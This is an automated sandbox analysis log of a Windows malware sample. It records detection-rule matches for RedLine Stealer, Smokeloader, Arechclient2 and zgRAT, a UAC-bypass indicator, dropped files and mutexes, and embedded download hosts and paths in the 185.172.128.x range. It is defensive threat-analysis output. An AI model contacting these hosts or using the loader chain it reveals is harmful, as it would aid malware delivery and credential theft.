                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6C903620 appears 51 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6C03CBE8 appears 134 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6C909B10 appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6CA609D0 appears 196 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6C0494D0 appears 90 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6CA6DAE0 appears 46 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 004043B0 appears 316 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: String function: 6CA6D930 appears 37 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 00691930 appears 76 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 00819D36 appears 33 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 006914F0 appears 60 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 6C944701 appears 60 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 6C946320 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 00691900 appears 31 times
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: String function: 00691310 appears 36 times
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: String function: 03159F27 appears 48 times
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: String function: 00409CC0 appears 48 times
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: String function: 0042780C appears 44 times
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: String function: 03177A73 appears 43 times
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1744307619.0000000004AAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1742146698.0000000004A73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1743378306.0000000004A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1742090590.0000000004A69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1744753442.0000000004A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000002.1900142864.0000000004A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1740502555.0000000004A71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1739692264.0000000004A8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1742448933.0000000004A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1744601177.0000000004A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1737477677.0000000004A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000002.1898621096.0000000003019000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1742071861.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1737660895.0000000004A82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1739519083.0000000004A84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1743586340.0000000004A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1737928184.0000000004A71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1743305315.0000000004A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1737614357.0000000004A6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
                                Source: g77dRQ1Csm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: 2.2.run.exe.3a2fd5b.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: 2.2.run.exe.3a2f15b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 17.2.cmd.exe.5427976.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 15.2.run.exe.3e5286d.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 3.2.cmd.exe.5472264.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 2.2.run.exe.39eb86d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 3.2.cmd.exe.5472e64.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: 17.2.cmd.exe.546b264.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: 15.2.run.exe.3e96d5b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 15.2.run.exe.3e9615b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 17.2.cmd.exe.546be64.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 3.2.cmd.exe.542e976.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                Source: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                                Source: 3.2.cmd.exe.5e100c8.8.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                                Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f47d0000.9.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformBlock'
                                Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f47d0000.9.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f47d0000.9.raw.unpack, WinZipAesCipherStream.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@27/66@4/8
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C067030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6C067030
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006CD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,2_2_006CD660
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F67D8E CreateToolhelp32Snapshot,Module32First,0_2_02F67D8E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,0_2_0042628B
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006A8040 LoadResource,LockResource,SizeofResource,2_2_006A8040
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeMutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5288
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1720
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile created: C:\Users\user\AppData\Local\Temp\u42w.0.exeJump to behavior
                                Source: Yara matchFile source: 5.0.u42w.3.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000000.1772107020.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1773870952.0000000005DF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u42w.3.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: five0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: five0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.900_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.900_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.900_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: Installed0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: Installed0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.590_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.590_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2030_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2030_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /timeSync.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /timeSync.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2030_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.590_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /timeSync.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /1/Package.zip0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /1/Package.zip0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /1/Package.zip0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .zip0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .zip0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: \run.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: \run.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_00424A0E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: @0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.900_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.900_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.900_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: Installed0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: Installed0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.590_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.590_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2030_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2030_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /syncUpd.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /syncUpd.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /timeSync.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /timeSync.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2030_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.590_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /timeSync.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /syncUpd.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /1/Package.zip0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /1/Package.zip0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /1/Package.zip0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .zip0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .zip0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: \run.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: \run.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /BroomSetup.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /BroomSetup.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: 185.172.128.2280_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: /BroomSetup.exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_03174C75
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCommand line argument: .exe0_2_03174C75
                                Source: g77dRQ1Csm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
